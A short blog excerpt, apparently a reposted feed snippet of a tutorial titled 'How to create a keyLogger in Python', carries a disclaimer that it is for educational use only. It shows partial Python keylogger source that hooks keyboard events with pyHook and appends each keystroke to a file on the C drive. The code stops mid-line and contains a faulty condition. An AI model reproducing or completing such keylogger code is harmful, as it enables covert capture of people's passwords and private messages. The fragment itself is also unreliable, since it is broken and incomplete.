In this tutorial we are ging to learn how to create keylogger in python, you can use to log your keys in your computer This Tutorial is only for educational purposes if you use the code on other’s computer without their permission we won’t carry any responsibility. Open up an empty file in your favorite text editor and Buckle Up import win32api import sys import pythoncom, pyHook buffer = '' def OnKeyboardEvent(event): if event.Ascii == 5: sys.exit() if event.Ascii != 0 or 8: f = open ('c:\\output.txt', 'a') keylogs = chr(event.Ascii) if event.Ascii == 13: keylogs = keylogs +
The post How to create a keyLogger in Python appeared first on Coding Security.
How to create a keyLogger in Python
read more
Tidak ada komentar:
Posting Komentar